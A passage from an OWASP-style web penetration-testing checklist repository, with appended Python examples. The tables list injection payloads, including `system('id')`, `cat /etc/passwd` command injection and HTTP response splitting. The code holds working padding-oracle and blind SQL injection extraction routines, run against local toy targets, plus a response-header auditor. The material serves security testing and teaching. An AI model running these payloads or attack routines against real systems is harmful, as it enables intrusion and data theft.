" - >` and `[a-zA-Z0-9]`, include String = ``|{{proxy}}|Not Started|| 21 | |OTG-INPVAL-010|XPath Injection|Check for XML error enumeration by supplying a single quote (`'`), Username: `‘ or ‘1’ = ‘1`, Password: `‘ or ‘1’ = ‘1`|{{proxy}}|Not Started|| 22 | |OTG-INPVAL-011|IMAP/SMTP Injection|Identifying vulnerable parameters with special characters (i.e.: `\`, `‘`, `“`, `@`, `#`, `!`, `\|`), Understanding the data flow and deployment structure of the client, IMAP/SMTP command injection (Header, Body, Footer)|{{proxy}}|Not Started|| 23 | |OTG-INPVAL-012|Code Injection|Enter OS commands in the input field: `?arg=1; system('id')`|{{proxy}}|Not Started|| 24 | ||Local File Inclusion||{{manual}}|Not Started|| 25 | ||Remote File Inclusion||{{manual}}|Not Started|| 26 | |OTG-INPVAL-013|Command Injection|Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server, `%3Bcat%20/etc/passwd`, `test.pdf+\|+Dir C:\`|{{proxy}}|Not Started|| 27 | |OTG-INPVAL-014|Buffer Overflow|Testing for heap overflow vulnerability, Testing for stack overflow vulnerability, Testing for format string vulnerability|{{scanner}}|Not Started|| 28 | ||Heap Overflow||{{manual}}|Not Started|| 29 | ||Stack Overflow||{{manual}}|Not Started|| 30 | ||Format String||{{manual}}|Not Started|| 31 | |OTG-INPVAL-015|Incubated Vulnerabilities|File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)|{{proxy}}|Not Started|| 32 | |OTG-INPVAL-016|HTTP Splitting/Smuggling|`param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0aSorry,%20System%20Down`|{{proxy}}|Not Started|| 33 | -------------------------------------------------------------------------------- /checklist/error_handling.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Error Handling Testing|Test 
Name|Description|Tools|Status|Comment| 5 | |----------------------|---------|-----------|-----|------|-------| 6 | |OTG-ERR-001|Error Codes|Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)|{{proxy}}|Not Started|| 7 | |OTG-ERR-002|Stack Traces| Invalid Input / Empty inputs, Input that contains non alphanumeric characters or query syntax, Access to internal pages without authentication, Bypassing application flow|{{proxy}}|Not Started|| 8 | -------------------------------------------------------------------------------- /checklist/identity_management.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Identity Management Testing|Test Name|Description|Tools|Status|Comment| 5 | |---------------------------|---------|-----------|-----|------|-------| 6 | |OTG-IDENT-001|Role Definitions|Validate the system roles defined within the application by creating permission matrix.|{{proxy}}|Not Started|| 7 | |OTG-IDENT-002|User Registration Process|Verify that the identity requirements for user registration are aligned with business and security requirements:|{{proxy}}|Not Started|| 8 | |OTG-IDENT-003|Account Provisioning Process|Determine which roles are able to provision users and what sort of accounts they can provision.|{{proxy}}|Not Started|| 9 | |OTG-IDENT-004|Account Enumeration, Guessable User Account|Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)|{{browser}}, {{proxy}}|Not Started|| 10 | |OTG-IDENT-005|Weak or Unenforced Username Policy|User account names are often highly structured (e.g. 
Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed.|{{browser}}, {{proxy}}|Not Started|| 11 | |OTG-IDENT-006|Permissions of Guest/Training Accounts|Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.|{{proxy}}|Not Started|| 12 | |OTG-IDENT-007|Account Suspension/Resumption Process|Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.|{{proxy}}|Not Started|| 13 | -------------------------------------------------------------------------------- /checklist/information_gathering.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Information Gathering|Test Name|Description|Tools|Status|Comment| 5 | |---------------------|---------|-----------|-----|------|-------| 6 | |OTG-INFO-001|Conduct Search Engine Discovery and Reconnaissance for Information Leakage|Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.|{{manual}}|Not Started|| 7 | |OTG-INFO-002|Fingerprint Web Server|Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. 
Using "HTTP header field ordering" and "Malformed requests test".|{{custom}}|Not Started|| 8 | |OTG-INFO-003|Review Webserver Metafiles for Information Leakage|Analyze robots.txt and identify Tags from website.|{{browser}}|Not Started|| 9 | |OTG-INFO-004|Enumerate Applications on Webserver|Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers|{{scanner}}|Not Started|| 10 | |OTG-INFO-005|Review Webpage Comments and Metadata for Information Leakage|Find sensitive information from webpage comments and Metadata on source code.|{{browser}}|Not Started|| 11 | |OTG-INFO-006|Identify application entry points|Identify from hidden fields, parameters, methods HTTP header analysis|{{browser}}|Not Started|| 12 | |OTG-INFO-007|Map execution paths through application|Map the target application and understand the principal workflows.|{{proxy}}|Not Started|| 13 | |OTG-INFO-008|Fingerprint Web Application Framework|Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.|{{manual}}|Not Started|| 14 | |OTG-INFO-009|Fingerprint Web Application|Identify the web application and version to determine known vulnerabilities and the appropriate exploits.|{{manual}}|Not Started|| 15 | |OTG-INFO-010|Map Application Architecture|Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database|{{browser}}|Not Started|| 16 | -------------------------------------------------------------------------------- /checklist/session_management.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Session Management Testing|Test Name|Description|Tools|Status|Comment| 5 | |--------------------------|---------|-----------|-----|------|-------| 6 | |OTG-SESS-001|Session Management Schema Bypass|SessionID analysis prediction, unencrypted cookie transport, brute-force.|{{proxy}}|Not Started|| 7 | 
|OTG-SESS-002|Cookies Attributes|Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.|{{proxy}}|Not Started|| 8 | |OTG-SESS-003|Session Fixation|The application doesn't renew the cookie after a successfully user authentication.|{{proxy}}|Not Started|| 9 | |OTG-SESS-004|Exposed Session Variables|Encryption & Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?|{{proxy}}|Not Started|| 10 | |OTG-SESS-005|Cross-Site Request Forgery|URL analysis, Direct access to functions without any token.|{{proxy}}|Not Started|| 11 | |OTG-SESS-006|Logout Functionality|Check reuse session after logout both server-side and SSO.|{{proxy}}|Not Started|| 12 | |OTG-SESS-007|Session Timeout|Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.|{{proxy}}|Not Started|| 13 | |OTG-SESS-008|Session Puzzling|The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.|{{proxy}}|Not Started|| 14 | -------------------------------------------------------------------------------- /report_template.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | # Summary of Findings 5 | 6 | |No.|Vulnerability Name|OTG|Affected Host/Path|Impact|Likelihood|Risk|Observation/Implication|Recommendation|Test Evidence| 7 | |---|------------------|---|------------------|------|----------|----|-----------------------|--------------|-------------| 8 | |{{index}}|{{vulnerability}}|{{otg}}|{{entity}}|{{impact}}|{{likelihood}}|{{risk}}|{{comment}}|{{remediation}}|{{evidence}}| 9 | -------------------------------------------------------------------------------- /variables.yml: -------------------------------------------------------------------------------- 1 | --- 2 | browser: ~ 3 | custom: ~ 4 | manual: ~ 5 
| proxy: ~ 6 | --------------------------------------------------------------------------------
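The three-state comparison in OTG-CRYPST-002 is the observable side of a padding oracle attack. The following Python is an added worked example, not code from this checklist or from the OWASP Testing Guide: it stands up a CBC-mode oracle that reveals only whether PKCS#7 padding was valid, then recovers the plaintext one byte at a time using that single bit. The 16-byte Feistel block cipher (HMAC-SHA256 round function) is an assumed stand-in for AES so the example runs on the standard library alone; the attack does not depend on which block cipher sits under CBC. The key, IV and plaintext at the bottom are constructed sample values. The last-byte step handles the classic edge case where a candidate passes because the decrypted block ends in 0x02 0x02 rather than 0x01.

```python
import hashlib, hmac

BLOCK = 16  # block size in bytes

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round_fn(key: bytes, rnd: int, half: bytes) -> bytes:
    # Round function of the toy cipher: HMAC-SHA256 truncated to 8 bytes.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    # 4-round Feistel network on 16-byte blocks: an assumed stand-in for AES,
    # used only so the example needs nothing outside the standard library.
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round_fn(key, rnd, right))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round_fn(key, rnd, left)), left
    return left + right

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(prev, padded[i:i + BLOCK]))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def make_padding_oracle(key: bytes):
    # The leak under test: the server answers only "padding valid" (states 1
    # and 2 of OTG-CRYPST-002) or "padding error" (state 3); the key never leaves.
    def oracle(iv: bytes, ct: bytes) -> bool:
        try:
            pkcs7_unpad(cbc_decrypt(key, iv, ct))
            return True
        except ValueError:
            return False
    return oracle

def recover_block(oracle, prev: bytes, block: bytes) -> bytes:
    # Recover one plaintext block from the oracle alone, last byte first.
    inter = bytearray(BLOCK)  # block_decrypt(key, block), learned byte by byte
    for pad in range(1, BLOCK + 1):
        pos = BLOCK - pad
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):  # bytes already known: force them to `pad`
            forged[j] = inter[j] ^ pad
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), block):
                continue
            if pad == 1:
                # Edge case: the block may have validated as 0x02 0x02 (or longer)
                # rather than 0x01. Disturb the byte before; a real 0x01 still passes.
                check = bytearray(forged)
                check[pos - 1] ^= 0xFF
                if not oracle(bytes(check), block):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle accepted no padding: not a CBC padding oracle")
    return _xor(bytes(inter), prev)

def padding_oracle_attack(oracle, iv: bytes, ct: bytes) -> bytes:
    # Every block is decrypted against its predecessor (the IV for the first).
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    padded = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                      for i in range(1, len(blocks)))
    return pkcs7_unpad(padded)

if __name__ == "__main__":
    key, iv = b"\x11" * 16, b"\x22" * 16  # constructed sample key and IV
    ct = cbc_encrypt(key, iv, pkcs7_pad(b"user=alice;role=admin;sid=7f3a"))
    print(padding_oracle_attack(make_padding_oracle(key), iv, ct))
```

The attacker side never sees the key: `padding_oracle_attack` receives only the IV, the ciphertext and the boolean oracle, and needs at most 256 queries per byte. On a real target the oracle is the difference between the application's responses in the three states the checklist row lists, so the fix is to make those states indistinguishable (authenticate the ciphertext before decrypting and return one generic error).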
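For the boolean-based technique in OTG-INPVAL-005, an added example in Python against an in-memory SQLite table (constructed sample schema and rows, not from the checklist): `user_exists_vulnerable` assembles the statement by string formatting, and `blind_extract` turns its only observable signal, row found or not found, into a character-by-character read of another column. The same routine run against the parameterised `user_exists_fixed` extracts nothing, which is the check a tester wants after the remediation.

```python
import sqlite3
import string

def make_db() -> sqlite3.Connection:
    # Constructed sample schema and rows; not from the checklist.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
               "password TEXT, is_admin INTEGER)")
    db.executemany(
        "INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
        [("alice", "Winter2024!", 1), ("bob", "hunter2", 0)],
    )
    return db

def user_exists_vulnerable(db, username: str) -> bool:
    # The injectable pattern: the statement is assembled by string formatting,
    # so a quote in `username` changes the SQL itself.
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return db.execute(sql).fetchone() is not None

def user_exists_fixed(db, username: str) -> bool:
    # Parameterised query: the value is bound, never parsed as SQL.
    sql = "SELECT 1 FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchone() is not None

def blind_extract(probe, column: str, table: str, where: str, max_len: int = 32) -> str:
    # Boolean-based blind extraction. `probe(payload)` submits the payload as the
    # username and returns the single bit the application leaks: row found or not.
    # Each question asks "is character `pos` of the secret equal to `ch`?".
    charset = string.ascii_letters + string.digits + string.punctuation
    secret = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            literal = ch.replace("'", "''")
            payload = (
                f"alice' AND substr((SELECT {column} FROM {table} WHERE {where}),"
                f"{pos},1)='{literal}'-- "
            )
            if probe(payload):
                secret += ch
                break
        else:
            break  # substr() past the end returns '' and matches nothing: end of value
    return secret

def demo() -> dict:
    db = make_db()
    target = ("password", "users", "username='alice'")
    return {
        "vulnerable": blind_extract(lambda p: user_exists_vulnerable(db, p), *target),
        "fixed": blind_extract(lambda p: user_exists_fixed(db, p), *target),
    }

if __name__ == "__main__":
    print(demo())
```

Each probe costs one request, so a 12-character value takes at most about 1,100 requests with this charset; the union, error-based and time-delay variants listed in the same row differ only in which channel carries the answer, not in the question being asked.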
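OTG-CONFIG-007 (HSTS), OTG-CLIENT-009 (clickjacking) and OTG-SESS-002 (cookie attributes) all come down to reading response headers, which is what the `curl -s -D-` line in the configuration table captures. As an added example that is not part of the checklist, this Python audits one captured raw response for all three at once. The `HSTS_MIN_AGE` threshold of one year is an assumed policy value (the figure hstspreload.org requires), the finding strings are this example's own, and the two responses at the bottom are constructed samples rather than captures from any host.

```python
HSTS_MIN_AGE = 31536000  # one year; assumed audit threshold (the hstspreload.org minimum)

def parse_response(raw: str):
    # Split a raw HTTP response into (status_line, [(name, value), ...]);
    # repeated headers such as Set-Cookie are kept in order, names lower-cased.
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers

def audit_hsts(headers):
    # OTG-CONFIG-007: header present, numeric max-age, long enough, covers subdomains.
    values = [v for n, v in headers if n == "strict-transport-security"]
    if not values:
        return ["OTG-CONFIG-007: no Strict-Transport-Security header"]
    directives = [d.strip().lower() for d in values[0].split(";")]
    findings, max_age = [], None
    for d in directives:
        if d.startswith("max-age=") and d[8:].isdigit():
            max_age = int(d[8:])
    if max_age is None:
        findings.append("OTG-CONFIG-007: HSTS max-age missing or malformed")
    elif max_age < HSTS_MIN_AGE:
        findings.append(f"OTG-CONFIG-007: HSTS max-age {max_age} is below {HSTS_MIN_AGE}")
    if "includesubdomains" not in directives:
        findings.append("OTG-CONFIG-007: HSTS lacks includeSubDomains")
    return findings

def audit_framing(headers):
    # OTG-CLIENT-009: a CSP frame-ancestors directive overrides X-Frame-Options,
    # so it is checked first; '*' there is as good as no protection at all.
    for v in [v for n, v in headers if n == "content-security-policy"]:
        for directive in v.split(";"):
            parts = directive.split()
            if parts and parts[0].lower() == "frame-ancestors":
                if "*" in parts[1:]:
                    return ["OTG-CLIENT-009: CSP frame-ancestors * lets any origin frame the page"]
                return []
    xfo = [v.strip().upper() for n, v in headers if n == "x-frame-options"]
    if any(v in ("DENY", "SAMEORIGIN") for v in xfo):
        return []
    return ["OTG-CLIENT-009: no X-Frame-Options DENY/SAMEORIGIN and no CSP frame-ancestors"]

def audit_cookies(headers):
    # OTG-SESS-002: Secure, HttpOnly, SameSite and persistence of every cookie set.
    findings = []
    for n, v in headers:
        if n != "set-cookie":
            continue
        parts = [p.strip() for p in v.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {}
        for p in parts[1:]:
            k, _, val = p.partition("=")
            attrs[k.strip().lower()] = val.strip()
        missing = [a for a in ("secure", "httponly") if a not in attrs]
        if missing:
            findings.append(f"OTG-SESS-002: cookie {name} lacks {', '.join(missing)}")
        if attrs.get("samesite", "").lower() not in ("strict", "lax"):
            findings.append(f"OTG-SESS-002: cookie {name} has no SameSite=Strict/Lax")
        if "expires" in attrs or "max-age" in attrs:
            findings.append(f"OTG-SESS-002: cookie {name} is persistent; confirm it is not a session token")
    return findings

def audit_response(raw: str):
    _, headers = parse_response(raw)
    return audit_hsts(headers) + audit_framing(headers) + audit_cookies(headers)

# Constructed sample responses (not captured from any real host).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=300\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors *\r\n"
    "Set-Cookie: JSESSIONID=deadbeef; Path=/\r\n"
    "Set-Cookie: theme=dark; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "\r\n<html>...</html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=63072000; includeSubDomains; preload\r\n"
    "X-Frame-Options: DENY\r\n"
    "Set-Cookie: JSESSIONID=deadbeef; Path=/; Secure; HttpOnly; SameSite=Strict\r\n"
    "\r\n<html>...</html>"
)

if __name__ == "__main__":
    for finding in audit_response(WEAK_RESPONSE):
        print(finding)
```

Feed it the saved output of the curl command from OTG-CONFIG-007 (or a response copied out of the proxy) and paste the returned strings straight into the Comment column; an empty list is the expected result for a hardened host, as `HARDENED_RESPONSE` shows.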